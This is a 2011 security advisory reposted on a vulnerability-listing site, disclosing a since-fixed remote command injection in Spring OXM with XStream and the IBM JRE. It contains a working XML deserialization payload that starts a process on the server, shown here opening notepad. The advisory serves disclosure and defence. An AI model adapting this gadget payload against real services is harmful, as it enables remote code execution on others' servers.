Computer Security
[EN] securityvulns.ru no-pyccku


Related information

  Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  SEC Consult SA-20110701-0 :: Multiple SQL injection vulnerabilities in WordPress

  Multiple Cross-Site Scripting vulnerabilities in WebCalendar

  Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities

  FCKeditor Multiple 0day Vulnerabilities

From:pierre.ernst_(at)_ca.ibm.com <pierre.ernst_(at)_ca.ibm.com>
Date:06.07.2011
Subject:Spring Source OXM Remote OS Command Injection when XStream and IBM JRE are used

Reference:
http://static.springsource.org/spring/docs/3.0.x/spring-framework-reference/html/
oxm.html#d0e26722

Product: Spring Source OXM (Object/XML Mapping)
Vendor: VMware
Vulnerable Version: 3.0.4 only when XStream and IBM JRE are used
Status: Fixed
Vendor Notification: 12 October 2010
Vendor Fix: 20 October 2010
Vulnerability Type: Remote OS Command Injection (CAPEC-88)
Credit: Pierre Ernst, IBM Canada, Business Analytics

CVSS: 7.6
 AccessVector: Network
 AccessComplexity: High
 Authentication: None
 Confidentiality Impact: Complete
 Integrity Impact: Complete
 Availability Impact: Complete

Details:

Consider a service accepting XML input to be unmarshalled as an instance of the Bicycle class.

This is an example of legitimate input:

<bicycle>
 <name>unicycle</name>
 <id>123</id>
 <nbrWheels>1</nbrWheels>
 <nbrRiders>1</nbrRiders>
</bicycle>


This malicious input will execute the notepad application on the server and open the
C:\Windows\win.ini file

<bicycle class="java.util.TreeSet">
  <no-comparator />
  <object />
   <dynamic-proxy>
      <interface>java.lang.Comparable</interface>
      <handler class="java.beans.EventHandler">
         <target class="java.lang.ProcessBuilder">
          <command>
            <string>notepad.exe</string>
            <string>c:\windows\win.ini</string>
          </command>
         </target>
         <action>start</action>
      </handler>
   </dynamic-proxy>
</bicycle>

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod